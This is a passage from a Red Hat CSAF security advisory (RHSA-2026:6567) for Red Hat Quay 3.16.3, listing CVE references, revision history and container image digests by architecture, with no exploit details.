|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.16.3 is now available with bug fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.16.3",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6567",
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13465",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68158",
"url": "https://access.redhat.com/security/cve/CVE-2025-68158"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26996",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27628",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27904",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28498",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6567.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay 3.16.3",
"tracking": {
"current_release_date": "2026-04-16T11:09:20+00:00",
"generator": {
"date": "2026-04-16T11:09:20+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6567",
"initial_release_date": "2026-04-03T15:21:25+00:00",
"revision_history": [
{
"date": "2026-04-03T15:21:25+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-03T15:21:37+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:20+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Quay 3.16",
"product": {
"name": "Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3.16::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"product_id": "registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel9@sha256%3A8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1775169226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3A9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979245"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel9@sha256%3Acd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1775080009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"product": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"product_id": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel9@sha256%3A6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel9@sha256%3A96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1775152452"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774980202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3A2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3Ad5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774980237"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979245"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773781267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel9@sha256%3A053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775080009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"product_id": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel9@sha256%3A618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256%3A7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775174065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel9@sha256%3A4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775152452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"product_id": "registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel9@sha256%3A701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775169226"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3Afdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3Ace3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979245"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel9@sha256%3Af5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1775080009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"product": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"product_id": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel9@sha256%3Abbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel9@sha256%3Ab5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1775152452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"product_id": "registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel9@sha256%3A5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1775169226"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64",
"product_id": "registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel9@sha256%3Aefe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087?arch=arm64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775169226"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x"
},
"product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le"
},
"product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le as a component of Red Hat Quay 3.16",
